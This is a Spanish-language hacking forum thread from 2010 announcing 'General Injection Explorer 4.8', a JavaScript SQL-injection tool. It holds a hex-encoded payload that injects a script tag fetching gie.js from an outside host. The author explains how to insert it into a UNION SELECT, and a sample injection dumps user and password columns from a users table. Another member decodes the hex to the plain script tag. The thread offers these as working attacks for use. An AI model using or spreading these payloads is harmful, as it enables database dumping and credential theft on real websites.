GiE 4.8 - SQLi

Iniciado por Pony-Magic, 13 Diciembre 2010, 09:26 AM

0 Miembros y 1 Visitante están viendo este tema.

Pony-Magic

General Injection Explorer 4.8
version anterior.

  • ajax peticiones con async
  • dumpea tablas en <table> y .SQL
  • full path disclosure
  • write file



    ((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

    -> usar ((0xCode)) en vez de (0xCode)



    @name: General Injection Explorer
    @version: 4.8
    @author: PonyMagic
    @date: 12/12/2010 - 2:51
    @contact: PonyMagic@live.com


    PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b]

Darioxhcx

saaaaabeeeeeeeeeeeeeeeeeeeeee

Karcrack

Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?

Pony-Magic

Cita de: Karcrack en 17 Diciembre 2010, 11:23 AM
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?


cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo.
es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript.
Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto:

.php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4--

En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso.


xassiz~

Cita de: Karcrack en 17 Diciembre 2010, 11:23 AM
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?
Código (html4strict) [Seleccionar]
<script src='http://kryptosecurity.com.ar/gie.js'/>